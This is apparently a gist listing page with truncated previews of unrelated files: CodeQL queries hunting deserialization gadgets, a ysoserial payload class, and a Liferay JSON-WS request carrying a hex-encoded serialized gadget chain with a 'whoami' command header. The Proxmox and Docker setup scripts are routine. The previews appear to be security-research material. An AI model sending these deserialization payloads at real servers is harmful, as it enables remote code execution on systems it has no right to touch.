This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* @kind path-problem | |
*/ | |
import csharp | |
class StartMethod extends Getter { | |
StartMethod() { getName() = "get_Name" } | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* @kind path-problem | |
*/ | |
import csharp | |
class ODPSetter extends Setter { | |
ODPSetter() { | |
getDeclaringType().getName() = "ObjectDataProvider" and | |
getName() = "set_ObjectInstance" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* @kind path-problem | |
*/ | |
import java | |
class CustomSetterMethod extends Method { | |
CustomSetterMethod() { | |
getName().matches("set%") and | |
not getName().length() = 3 and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /api/setup/validate HTTP/1.1 | |
Host: localhost:3000 | |
Content-Length: 416 | |
Accept: application/json | |
Content-Type: application/json | |
User-Agent: Mozilla/5.0 | |
Connection: close | |
{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{ | |
"subprotocol":"h2", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# All commands will be executed on a Proxmox host | |
sudo apt update -y && sudo apt install libguestfs-tools -y | |
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img | |
# Install qemu-guest-agent on the image. Additional packages can be specified by separating with a comma. | |
sudo virt-customize -a jammy-server-cloudimg-amd64.img --install qemu-guest-agent | |
# Read and set root user password from file. | |
sudo virt-customize -a jammy-server-cloudimg-amd64.img --root-password file:password_root.txt | |
# Create an additional user. | |
sudo virt-customize -a jammy-server-cloudimg-amd64.img --run-command "useradd -m -s /bin/bash myuser" | |
# Set password for that user. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package ysoserial.payloads; | |
import com.mchange.lang.ByteUtils; | |
import org.apache.commons.collections.Transformer; | |
import org.apache.commons.collections.functors.ChainedTransformer; | |
import org.apache.commons.collections.functors.ConstantTransformer; | |
import org.apache.commons.collections.functors.InvokerTransformer; | |
import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
import org.apache.commons.collections.map.LazyMap; | |
import ysoserial.payloads.annotation.Authors; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /api/jsonws/invoke HTTP/1.1 | |
Host: <Host> | |
Connection: close | |
cmd2: whoami | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 4912 | |
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def id_generator(size=6, chars=string.ascii_lowercase + string.digits): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
sudo su | |
wget -qO- https://get.docker.com/ | sh | |
COMPOSE_VERSION=`git ls-remote https://github.com/docker/compose | grep refs/tags | grep -oE "[0-9]+\.[0-9][0-9]+\.[0-9]+$" | sort --version-sort | tail -n 2 | head -n 1` | |
sudo sh -c "curl -L https://github.com/docker/compose/releases/download/v${COMPOSE_VERSION}/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose" | |
sudo chmod +x /usr/local/bin/docker-compose | |
# You're good to go, no more 404 not found! |
NewerOlder